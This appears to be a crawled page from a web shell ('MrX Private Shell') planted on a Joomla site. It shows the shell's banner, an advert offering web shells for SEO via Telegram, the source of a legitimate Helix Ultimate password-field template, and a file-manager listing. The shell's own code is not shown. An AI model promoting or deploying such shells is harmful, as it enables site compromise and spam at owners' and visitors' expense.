__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Helix Ultimate Framework
* @author JoomShaper https://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2021 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or Later
*/
defined ('JPATH_BASE') or die();
use HelixUltimate\Framework\Platform\Helper;
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
extract($displayData);
if ($meter)
{
HTMLHelper::_('behavior.formvalidator');
HTMLHelper::_('script', 'system/fields/passwordstrength.min.js', array('version' => 'auto', 'relative' => true));
$class = 'js-password-strength ' . $class;
if ($forcePassword)
{
$class = $class . ' meteredPassword';
}
}
HTMLHelper::_('script', 'system/fields/passwordview.min.js', array('version' => 'auto', 'relative' => true));
Text::script('JFIELD_PASSWORD_INDICATE_INCOMPLETE');
Text::script('JFIELD_PASSWORD_INDICATE_COMPLETE');
Text::script('JSHOW');
Text::script('JHIDE');
$attributes = array(
strlen(Helper::CheckNull($hint)) ? 'placeholder="' . htmlspecialchars(Helper::CheckNull($hint), ENT_COMPAT, 'UTF-8') . '"' : '',
!empty($autocomplete) ? 'autocomplete="off"' : '',
!empty($class) ? 'class="form-control ' . $class . '"' : 'class="form-control"',
$readonly ? 'readonly' : '',
$disabled ? 'disabled' : '',
!empty($size) ? 'size="' . $size . '"' : '',
!empty($maxLength) ? 'maxlength="' . $maxLength . '"' : '',
$required ? 'required aria-required="true"' : '',
$autofocus ? 'autofocus' : '',
!empty($minLength) ? 'data-min-length="' . $minLength . '"' : '',
!empty($minIntegers) ? 'data-min-integers="' . $minIntegers . '"' : '',
!empty($minSymbols) ? 'data-min-symbols="' . $minSymbols . '"' : '',
!empty($minUppercase) ? 'data-min-uppercase="' . $minUppercase . '"' : '',
!empty($minLowercase) ? 'data-min-lowercase="' . $minLowercase . '"' : '',
!empty($forcePassword) ? 'data-min-force="' . $forcePassword . '"' : '',
);
?>
<div class="password-group">
<div class="input-group">
<span class="input-group-text">
<span class="fas fa-key" aria-hidden="true"></span>
<span class="visually-hidden"><?php echo Text::_('JSHOW'); ?></span>
</span>
<input
type="password"
name="<?php echo $name; ?>"
id="<?php echo $id; ?>"
value="<?php echo htmlspecialchars(Helper::CheckNull($value), ENT_COMPAT, 'UTF-8'); ?>"
<?php echo implode(' ', $attributes); ?>>
<?php if (JVERSION >= 4) :?>
<button type="button" class="btn btn-secondary input-password-toggle">
<span class="icon-eye icon-fw" aria-hidden="true"></span>
<span class="visually-hidden"><?php echo Text::_('JSHOWPASSWORD'); ?></span>
</button>
<?php endif; ?>
</div>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| color | Folder | 0775 |
|
|
| calendar.php | File | 4.04 KB | 0664 |
|
| checkboxes.php | File | 3.77 KB | 0664 |
|
| contenthistory.php | File | 2.98 KB | 0664 |
|
| email.php | File | 3.35 KB | 0664 |
|
| file.php | File | 3.03 KB | 0664 |
|
| hidden.php | File | 2.56 KB | 0664 |
|
| media.php | File | 477 B | 0664 |
|
| meter.php | File | 3.16 KB | 0664 |
|
| moduleorder.php | File | 3.13 KB | 0664 |
|
| number.php | File | 3.4 KB | 0664 |
|
| password.php | File | 2.6 KB | 0664 |
|
| radio.php | File | 4.01 KB | 0664 |
|
| radiobasic.php | File | 3.84 KB | 0664 |
|
| range.php | File | 2.89 KB | 0664 |
|
| tel.php | File | 3.5 KB | 0664 |
|
| text.php | File | 4.48 KB | 0664 |
|
| textarea.php | File | 3.18 KB | 0664 |
|
| url.php | File | 3.25 KB | 0664 |
|
| user.php | File | 6.77 KB | 0664 |
|